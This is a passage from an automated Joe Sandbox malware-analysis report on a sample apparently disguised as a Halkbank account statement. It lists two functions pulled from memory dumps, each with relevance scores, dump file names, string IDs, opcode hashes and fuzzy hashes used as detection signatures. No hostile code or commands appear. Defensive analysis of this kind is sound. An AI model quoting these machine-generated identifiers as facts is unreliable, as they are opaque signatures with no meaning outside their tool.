                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0663E5C8 Relevance: 5.1, Strings: 4, Instructions: 96COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3224948863.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6630000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Xaq$Xaq$Xaq$Xaq
                                                              • API String ID: 0-4015495023
                                                              • Opcode ID: decfb9005079621b05cafa65a1a3e8fb410618bd9273fb99ec7bab3bfc58cc71
                                                              • Instruction ID: 6121d8116e951f37d9f4be1c9359e4bc7b6b52cb5e80dcf67befe2b5f4b7b7a7
                                                              • Opcode Fuzzy Hash: decfb9005079621b05cafa65a1a3e8fb410618bd9273fb99ec7bab3bfc58cc71
                                                              • Instruction Fuzzy Hash: CA31C875E0023B4BDF798A69C54077FB6B1AF95340F2000BAC915A7781EA32DD41DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 010060E8 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3221147522.0000000001000000.00000040.00000800.00020000.00000000.sdmp, Offset: 01000000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1000000_Halkbank_Ekstre_20230426_075819_154055.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: \;]q$\;]q$\;]q$\;]q
                                                              • API String ID: 0-2351511683
                                                              • Opcode ID: a22f1eb5797c33cefad6088869b8f751c2008dd80f7e1a79c34a5456014d31fb
                                                              • Instruction ID: 2bdc8b6dd346c622af2de28dc00a7c931bd3bed8baff738f91da6b8d471ddae5
                                                              • Opcode Fuzzy Hash: a22f1eb5797c33cefad6088869b8f751c2008dd80f7e1a79c34a5456014d31fb
                                                              • Instruction Fuzzy Hash: 3C01D431700015CFFBA68E2CC48096977E7AFC8760F1940A9E086CB3F2DA72DC618780
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%